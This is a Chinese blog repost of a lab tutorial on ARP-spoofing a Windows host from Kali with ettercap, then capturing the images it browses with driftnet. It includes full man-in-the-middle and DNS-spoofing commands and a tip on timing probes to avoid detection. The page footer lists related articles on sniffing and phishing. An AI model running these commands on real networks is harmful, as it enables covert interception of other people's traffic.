ettercap + driftnet 实现同网段下流量欺骗

最新推荐文章于 2024-08-16 09:15:31 发布
最新推荐文章于 2024-08-16 09:15:31 发布
阅读量369 收藏 4
点赞数
文章标签: 运维 开发工具 网络
原文链接:http://www.cnblogs.com/lemonyam/p/10957978.html
版权

前言:

  由于在局域网中,网关会不断地发送 ARP 数据包询问当前是否有新的客户端上线,如果我们可以欺骗当前局域网网段下的主机,

  把我们当成网关地址,并且我们把欺骗的流量转发到真正的网关地址,这样我们就可以嗅探到别人的信息

 

实验环境:

  1、虚拟机 A(kali)

  2、实验主机 B(win 10)

  3、保证虚拟机和主机在同一网段,方法在上一篇有写

 

实验步骤:

  1、kali 里使用 netdiscover -i eth0 [-r range...] 来获取目标主机的 IP 地址,这里直接使用主机 B 的 IP 和网关

  2、kali 终端使用 ettercap -i eth0 -Tq -M arp:remote /// /// 来进行流量欺骗,前一个 /// 为 B 的 IP,后者为网关

注:/// 的完整写法为 MAC/IPs/IPv6/PORTs,默认为全部,MAC 为物理地址,IPs 为 IPv4,PORTs 为端口号

  若  ettercap 操作失败,需要我们对其进行提权

  修改 /etc/ettercap/etter.conf 文件,将 ec_uidec_gid 的值改为 0,可以使用  leafpad、vim 等进行操作

 

  3、打开一个新的终端,通过 driftnet -i eth0 -a -d dir 来把 B(目标主机)浏览的图片保存在目录 dir 里,也可以通过 -b 弹窗直接查看浏览的图片

 

  4、打开主机 B 的浏览器查看图片(需要 http 的)

 

  5、在 kali 里打开相应文件夹,查看里面的内容

 

扩展: 

  1、netdiscover

    a、基于 ARP 协议

    b、主动被动地发现WIFI或交换网络的主机

    c、常用参数选项:

      -i :接口。选择你监控的接口,比如eth0

      -r :range 比如192.168.0.0/24(/24 表示网络号为 24 位)

      -l :从文件读取range列表

      -p :被动模式

      -t :每个ARP请求之间等待时长,单位为毫秒。这个可以用来规避检测系统的告警

      -c :对每个IP发多少个探针

      -P :输出形式更适合重定向到一个文件中。

注:具体可以使用 man netdiscovernetdiscover -h 来查询详细操作

  ARP 协议是将 IP 地址转换为 MAC 地址(物理地址)地网络协议

  局域网中主机的通讯是通过 MAC 地址来实现的,区分 IPv4 里的网络号和主机号

 

  2、ettercap [OPTIONS] [TARGET1] [TARGET2]:

    a、两种运行方式:UNIFIED 方式是以中间人方式嗅探;BRIDGED 方式是在双网卡情况下,嗅探两块网卡之间的数据包

    b、常用参数:

      -i :指定接口

      -T :文本模式,常配合 -q 安静模式使用,-s 表示加载脚本

      -M :指定中间人模式

        ·ARP 欺骗:arp:remote(双向)、arp:oneway(单向,欺骗目标一到目标二的通讯)

        ·ICMP 欺骗:icmp:(MAC/IP)

        ·DHCP 欺骗:dhcp:(ip_pool/netmask/dns)

      如:-M dhcp:/255.255.255.0/192.168.0.1 不提供 IP 地址,只欺骗目标子网掩码和 DNS 服务器

    c、常见参数组合:

      ARP 毒化 eth0 所在的网段,安静模式文本显示:ettercap -Tqi eth0 -M ARP /// ///

      对 192.168.1.120 进行 DNS 欺骗,使用默认网卡 eth0,文本模式安静显示:ettercap -Tq -P dns_spoof -M arp:remote /192.168.1.120// ///

 

  3、driftnet [options] [filter code]:

    a、driftnet 是一款使用简单的图片捕获工具,可以很方便的在网络数据包中抓取图片

    b、参数命令:

      -b :捕获到新的图片时发出嘟嘟声

      -i :选择监听接口

      -f:读取一个指定 pcap 数据包中的图片

      -p :不让所监听的接口使用混杂模式

      -a :后台模式,将捕获的图片保存到目录中(不会显示在屏幕上)

      -m :指定保存图片数的数目

      -d :指定保存图片的路径(目录)

      -x:指定保存图片的前缀名

转载于:https://www.cnblogs.com/lemonyam/p/10957978.html

weixin_30527143
关注
使用ettercap和sslstrip进行简单的网络嗅探
weixin_43189623的博客
11-08 2163
ettercap简介 Ettercap刚开始只是作为一个网络嗅探器,但在开发过程中,它获得了越来越多的功能,在中间的攻击人方面,是一个强大而又灵活的工具。它支持很多种协议(即使是加密的),包括网络和主机产品特征分析。 它主要有2个嗅探选项: UNIFIED,这个模式可以嗅探到网络上的所有数据包,可以选择混杂模式(-p选项)。如果嗅探到的数据包不是ettercap主机的就自动用第3层路由转发。...
【愚公系列】2024年02月 《网络安全应急管理与技术实践》 010-网络安全应急技术与实践(网络层-无线ARP欺骗与消息监听重现分析)
热门推荐
时光隧道
02-08 8万+
无线ARP欺骗(Wireless ARP Spoofing)是一种网络攻击方式,它利用ARP(地址解析协议)中的漏洞,欺骗通信双方,使其将通信数据发送给攻击者,从而实现中间人攻击。消息监听(Message Eavesdropping)则是指攻击者截获并监听通信双方之间的通信数据。以下是无线ARP欺骗与消息监听的重现分析过程:攻击者在同一局域网中启动无线ARP欺骗工具,如Ettercap、ARPwner等。攻击者扫描附近的无线网络,获取目标网络的SSID(无线网络名称)和MAC地址。
arp嗅探——ettercap+driftnet
c/c++、x86汇编、Win32汇编、逆向、破解
12-27 1732
ARP: 地址解析协议,根据IP地址查询MAC物理地址,以便进行物理网络通信。   ARP原理: A电脑192.168.1.2想与B电脑192.168.1.3通信,网络通信必需知道对方的MAC物理地址才可以传输数据,所以A电脑在网络上广播说:IP地址是192.168.1.3是谁,把你的MAC物理地址告诉我。不是B的电脑收到广播后发现跟自己无关,就不回话,只有B电脑进行回话告诉A自己的MAC...
无线局域网的嗅探攻击和防御——ettercap+driftnet
隔壁云老王的博客
03-12 3万+
该文章为本人所写关于无线局域网下对其他PC的嗅探攻击和防御文档,但并非自我设计,乃是看取其他大神的博客总结而来。
Driftnet: 网络流量图像捕捉工具
最新发布
gitblog_00502的博客
08-16 325
Driftnet: 网络流量图像捕捉工具 driftnet Driftnet watches network traffic, and picks out and displays JPEG and GIF images for display项目地址:https://gitcode.com/gh_mirrors/dr/driftnet 1. 项目介绍 Driftnet 是一个开源的网络嗅探工具...
ettercap+driftnet+cookiehacker的一次实战
Grey的博客
01-05 3716
一、ettercap ①打开ettercap root权限下打开ettercapettercap -C (curses UI)             ettercap -G (GTK+ GUI) ②打开ettercap之后,选择Sniff----Unified-sniffing,然后选择网卡: ③然后Hosts---Scan for hosts---Hosts list,此
ettercapdriftnet实现中间人攻击
u011500307的专栏
03-21 1万+
1. 直接来用ettercap的图形界面来实现吧,sudo ettercap -G 2. 在菜单sniff中选择unified sniffer,再选择你用的网卡。 3. 菜单中选择hosts-->scan for hosts,之后选择hosts-->hosts list。从中将路由器的ip加到target 1,将要攻击的电脑ip加到target 2。不过这个scan有点问题,老
渗透测试实战之ARP欺骗攻击(ARP断网攻击和流量转发)
z_s_s_f的博客
12-17 4279
抓取图片以及http、https协议的用户名和密码,使用arpspoof、sslstrip、driftnetettercap这四个工具他们的关系与执行顺序是什么样的。
嗅探工具 --- wireshark、tcpdump、dsniff、ettercap、bettercap、netsniff-ng
墨鱼菜鸡
07-11 5097
最好的 MitM 中间人攻击开源框架清单:https://github.com/Chan9390/Awesome-MitM 哔哩哔哩:https://search.bilibili.com/all?keyword=wireshark 1、WireShark WireShark 是一个开源免费的高性能网络协议分析软件,它的前身就是非常著名的网络分析软...
Linux环境下ARP攻击的实现与防范
qq_38296022的博客
05-04 895
#引言 相信很多处于局域网的朋友对ARP攻击并不陌生,在我们常用的Windows操作系统下拥有众多ARP防火墙,可以很好的阻断ARP攻击,但是如果使用的是Linux系统要怎么做才能防止ARP攻击呢?想要防御就需要先了解攻击的原理。这篇文章使用Kali系统(基于Debian的众多发行版之一),实例演示Linux系统如何实施ARP攻击以及如何防范。 #文章目录 0×1.ARP工作原理 0×2.使用arpspoof实现中间人arp攻击 0×3.使用ettercap实现中间人arp攻击 0×4.使用driftne
ARPSpoofing、arp欺骗性攻击、arpspoof源码分析
Bonjour~
03-18 1万+
ARPSpoofing 什么是ARP协议 一台主机和另一台主机通信,要知道目标的IP地址,但是在局域网传输的网卡却不能直接识别IP地址,所以用APR解析协议将IP地址解析成MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,来查询设备的MAC地址。 在局域网的任意一台主机中,都有一个ARP缓存表,里面保存本机已知的此局域网中各主机和路由器的IP地址和MAC地址的对照表关系。ARP缓存表的生命周
利用Ettercap进行钓鱼攻击
qq_69775412的博客
07-07 665
Ettercap是一款流行的网络安全工具,可用于网络嗅探、欺骗和分析攻击。它可以截获网络流量,使用户可以查看到传输过程的明文内容,或者通过中间人攻击来修改原始数据包。我们可以利用ARP协议特性,使用ettercap在内网不断的发送和抢答MAC地址,让受害者访问网关及DNS服务器实际均为攻击者的服务器。
【Linux云计算架构:第三阶段-Linux高级运维架构】第19章——安装Kali黑客操作系统-利用ettercap实施中间人攻击
就叫一片白纸的博客
07-25 719
内容: 19.1 安装Kali黑客操作系统及相关实战 19.2 实战:linux之kali系统ssh服务开启 19.3 实战: kali下的nmap扫描工具 19.4 MITM中间人攻击理论 19.5 实战:使用 Ettercap 工具实现中间人攻击 Kali或BT 听过:1 没听过:6 19.1 Kali概述: Kali 一为linux操作系统的一个发行版。 Kali Lin...
Driftnet学习笔记
GuoXuan_CHN的博客
03-29 5494
Driftnet学习笔记工具介绍 driftnet是一款简单而使用的图片捕获工具,可以很方便的在网络数据包中抓取图片。 这次用到这个工具的原因是与 ettercap 相配合,抓去被害人浏览的图片。 此篇应与 ettercap ARP欺骗相互配合观看。 命令介绍命令原型driftnet [options] [filter code] 参数命令 -b :捕获
NO.26——利用ettercapdriftnet截获数据流里的图片
ghl1390490928的博客
08-06 8721
原理                   Ettercap最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析。          Ettercap的运行方式归纳为UNIFIED和BRIDGED两种。 UNIFIED的方式是以中间人方式嗅探; BRIDGED方式...
局域网攻击ettercap 详解(dns 欺诈)
xk的博客
08-17 1万+
ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。 ettercap是一款现有流行的网络抓包软件,它利用计算机在局域网内进行通信的ARP协议的缺陷进行攻击,在目标与服务...
DNS欺骗driftnet获取主机图片
田一柠的博客
12-05 1966
arpspoof -i eth0 -t 192.168.3.1 192.168.3.66 注意这里,前面是网关,否则不会成功。实现需要按照dsniif支持 driftnet -i eth0 -d /home/kali/pic/ https部分网站不成功。 ● -i 监听网卡 ● -b 声音提醒 ● -a 保存图片(这样的话图片不会显示在窗口) ● -d 图片保存目录,例:driftnet -i wlan0 -b -a -d /pic ...
ettercap+dns欺骗
09-16
ettercap是一种开源的网络安全工具,可以用于执行各种网络欺骗攻击,包括DNS欺骗。DNS欺骗是一种常见的攻击技术,它允许攻击者篡改网络中的DNS响应,将用户的网络流量重定向到恶意的网站或服务器上。 要使用ettercap进行DNS欺骗,您需要进行以下步骤: 1. 配置ettercap:首先,您需要配置ettercap来监听网络流量并执行攻击。您可以使用ettercap命令行工具或图形界面工具来完成此操作。 2. 扫描网络:使用ettercap扫描网络,找到目标主机和潜在的受害者。这将帮助您确定哪些主机可以进行攻击。 3. 启动DNS欺骗:一旦您找到目标主机和潜在的受害者,您可以使用ettercap来执行DNS欺骗。通过篡改DNS响应,您可以将受害者的流量重定向到您选择的恶意网站或服务器上。 4. 窃听和篡改流量:一旦DNS欺骗成功,ettercap将会窃听受害者的流量,并且您可以选择篡改数据包以执行其他类型的攻击,如中间人攻击或数据包嗅探。 请注意,DNS欺骗是一种违法和不道德的行为,只能在合法的渗透测试或授权的安全评估中使用。未经授权地执行DNS欺骗可能会导致严重的法律后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值